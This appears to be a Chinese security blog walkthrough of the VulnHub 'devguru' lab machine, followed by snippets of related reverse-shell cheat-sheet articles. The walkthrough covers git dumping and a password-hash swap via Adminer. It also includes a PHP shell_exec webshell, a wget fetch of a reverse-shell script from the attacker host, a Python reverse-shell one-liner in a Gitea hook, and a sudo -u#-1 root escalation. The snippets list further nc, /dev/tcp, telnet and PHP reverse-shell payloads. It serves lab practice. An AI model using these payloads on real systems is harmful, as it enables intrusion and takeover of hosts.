<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    vulnhub之devguru的實踐

    VSole2022-07-24 18:44:07

    今天實踐的是vulnhub的devguru鏡像,

    下載地址,https://download.vulnhub.com/devguru/devguru.ova.7z,

    用workstation導入成功,直接拿到地址,

    進行端口掃描,sudo nmap -sS -sV -T5 -A -p- 192.168.58.141,

    掃描到的192.168.58.141:80/.git和http://devguru.local:8585很有用,

    先用gitdumper對git進行爆破,

    git clone https://github.com/arthaud/git-dumper.git,

    cd git-dumper,mkdir backup,

    python3 git_dumper.py http://192.168.58.141:80/.git/ backup,

    cd backup,看到個adminer.php,瀏覽器訪問一下,

    繼續從其它文件中獲取信息,cd config,

    cat database.php得到數據庫訪問信息,

    登錄后找到一個賬號記錄frank,

    根據密碼hash的特征猜測是bcrypt方式,找個在線的bcrypt站點,

    給自己的密碼password生成hash值,

    把生成的hash值替換掉frank的密碼,

    就能用frank/password登錄http://192.168.58.141/backend/backend/auth/signin了,登錄后找到可以提交代碼的頁面,Code里貼上,

    function onStart()

    {

       $this->page["myVar"] = shell_exec($_GET['cmd']);

    }

    Markup里貼上,{{ this.page.myVar }},

    保存后,訪問http://192.168.58.141?cmd=ls試試效果,

    下載一個php的反彈shell腳本,https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php,改好信息,

    kali攻擊機上做個http下載,python2 -m SimpleHTTPServer,

    執行http://192.168.58.141?cmd=wget http://192.168.58.131:8000/php-reverse-shell.php,

    kali攻擊機上開個反彈shell監聽,nc -lvp 4444,

    訪問http://192.168.58.141/php-reverse-shell.php,

    kali攻擊機上拿到反彈shell,不是root,先轉成交互式的,

    從/var/backups/app.ini.bak里發現賬戶信息gitea/UfFPTF8C8jjxVF2m,

    再次登錄http://192.168.58.141/adminer.php,再次把密碼換掉,

    就能用frank/password登錄http://192.168.58.141:8585/user/login了,

    登錄后找到可以提交代碼的頁面,http://192.168.58.141:8585/frank/devguru-website/settings/hooks/git/pre-receive,提交代碼,

    python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.58.131",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);',

    kali攻擊機上開個反彈shell監聽,nc -lvp 1234,

    為了讓反彈shell發生,假裝編輯一下readme并提交,

    kali攻擊機上拿到反彈shell,sudo -l發現sqlite3是root執行的,搜一下提權方法,

    最后靠sudo的版本漏洞找到最終的提權命令,

    sudo -u#-1 sqlite3 /dev/null '.shell /bin/sh',id看一下是root,

    shellsocket
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    安全研究人員觀察到名為 TellYouThePass 的勒索軟件家族嘗試利用最近發現的 Log4j 高危漏洞。TellYouThePass 勒索軟件家族被認為年代比較悠久且基本不活躍,在廣泛使用的 Log4j 日志框架發現漏洞之后,該勒索軟件家族再次活躍。研究人員表示,繼 Khonsari 勒索軟件之后,TellYouThePass 成為第二個被觀察到利用 Log4j 漏洞(被稱為Log4Shel
    反彈shell的N種姿勢
    2021-09-26 09:00:48
    在滲透測試的過程中,在拿到webshell以后,如果目標主機是Windows主機,則是通過開3389端口在遠程連接,如果目標主機是linux服務器,一般我們都會選擇反彈shell來進行操作。在這里總結下反彈shell常見的幾種姿勢。
    反彈Shell大全與原理
    2023-04-25 10:15:00
    reverse shell與telnet,ssh等標準shell對應,本質上是網絡概念的客戶端與服務端的角色反轉。對方主機在局域網內,從外網無法直接訪問。對方主機上存在WAF,對主動連接發來的請求數據檢測嚴格,而對向外發出的請求不進行檢測或檢測較少。對方由于防火墻等限制,對方機器只能發送請求,不能接收請求。在滲透測試過程中,得到webshell后一般我們會反彈shell。反彈shell原理A主機開啟9090端口的tcp服務
    在我們滲透測試的過程中,最常用的就是基于tcp/udp協議反彈一個shell,也就是反向連接。我們先來講一下什么是正向連接和反向連接。centos執行python -c 'import socket,subprocess,os;s=socket.socket;s.connect;os.dup2; os.dup2; os.dup2;p=subprocess.call;'. 這個payload是反向連接并且只支持Linux,Windows可以參考離別歌師傅的python windows正向連接后門。這樣會把目標機的/bin/bash反彈給攻擊機但是很多Linux的nc很多都是閹割版的,如果目標機器沒有nc或者沒有-e選項的話,不建議使用nc的方式.PHP攻擊機監聽nc -lvvp 4444. 要求目標機器有php然后執行php -r '$sock=fsockopen;exec;'. 加載64位的shellcode需要用64位的msbuildC:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
    是Linux中的一個特殊設備,打開這個文件就相當于發出了一個socket調用,建立一個socket連接,讀寫這個文件就相當于在這個socket連接中傳輸數據。同理,Linux中還存在/dev/udp/。telnet反彈nc -lvvp 444 #攻擊者主機上執行監聽rm -f /tmp/p; mknod /tmp/p p && telnet x.x.x.x 4444 0/tmp/p #目標主機上執行。監聽兩個端口分別用來輸入和輸出,其中x.x.x.x均為攻擊者ip反彈shell成功后,在監聽4444端口的終端中執行命令可以在另一個終端中看到命令執行結果。 nc反彈nc -lvvp portnc -e /bin/bash x.x.x.x port
    反彈shell命令速查
    2022-07-28 06:13:42
    反彈shell命令速查
    常用反彈shell方法總結
    反彈shell匯總
    2021-07-28 10:01:11
    反彈shell匯總
    反彈shell是獲取Linux交互shell的一種方法,其方法背后的原理是什么呢
    之前在網上看到很多師傅們總結的linux反彈shell的一些方法,為了更熟練的去運用這些技術,于是自己花精力查了很多資料去理解這些命令的含義,將研究的成果記錄在這里,所謂的反彈shell,指的是我們在自己的機器上開啟監聽,然后在被攻擊者的機器上發送連接請求去連接我們的機器,將被攻擊者的shell反彈到我們的機器上,下面來介紹分析幾種常用的方法。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类